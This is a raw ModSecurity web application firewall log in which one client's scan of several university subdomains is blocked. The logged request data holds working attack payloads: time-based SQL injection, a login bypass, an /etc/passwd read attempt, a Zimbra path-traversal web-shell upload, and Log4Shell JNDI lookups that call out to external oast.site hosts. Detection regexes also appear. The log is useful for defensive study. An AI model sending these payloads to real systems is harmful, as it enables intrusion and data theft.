[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAPDoMYAAAAP"]
[Tue Aug 29 11:34:08.343282 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAShCVMAAAAi"]
[Tue Aug 29 11:34:08.344878 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASHh50AAAAD"]
[Tue Aug 29 11:34:08.352879 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASK4eUAAAAI"]
[Tue Aug 29 11:34:08.359308 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASfNuQAAAAg"]
[Tue Aug 29 11:34:08.363793 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAShCVQAAAAi"]
[Tue Aug 29 11:34:08.363839 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAPDoMcAAAAP"]
[Tue Aug 29 11:34:08.364395 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11QMCo-f0AAASEJSsAAAAE"]
[Tue Aug 29 11:34:08.365516 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAPLwFoAAAAX"]
[Tue Aug 29 11:34:08.366821 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASHh54AAAAD"]
[Tue Aug 29 11:34:08.369750 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARtAEwAAAAV"]
[Tue Aug 29 11:34:09.303169 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAASAHgUAAAAH"]
[Tue Aug 29 11:34:09.306108 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAARtAE0AAAAV"]
[Tue Aug 29 11:34:09.308379 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAASPDKIAAAAS"]
[Tue Aug 29 11:34:09.319507 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAAPLwFwAAAAX"]
[Tue Aug 29 11:34:09.327035 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAAST5AMAAAAZ"]
[Tue Aug 29 11:34:09.332626 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASS794AAAAY"]
[Tue Aug 29 11:34:09.339034 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAAPLwF0AAAAX"]
[Tue Aug 29 11:34:09.343302 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASLqC4AAAAM"]
[Tue Aug 29 11:34:10.309507 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASHh6EAAAAD"]
[Tue Aug 29 11:34:10.311289 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASS798AAAAY"]
[Tue Aug 29 11:34:10.312082 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASMggAAAAAO"]
[Tue Aug 29 11:34:10.313117 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASEJS4AAAAE"]
[Tue Aug 29 11:34:10.320627 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAARQ4GIAAAAB"]
[Tue Aug 29 11:34:10.327532 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAQKOskAAAAs"]
[Tue Aug 29 11:34:10.331434 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAAST5AYAAAAZ"]
[Tue Aug 29 11:34:10.347152 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAAQKOsoAAAAs"]
[Tue Aug 29 11:34:10.356925 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASQqAYAAAAT"]
[Tue Aug 29 11:34:10.367026 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgdp1r3wryyxy4p.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAAPLwGAAAAAX"]
[Tue Aug 29 11:34:10.375214 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgyemagkrpp3nwe.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASHh6QAAAAD"]
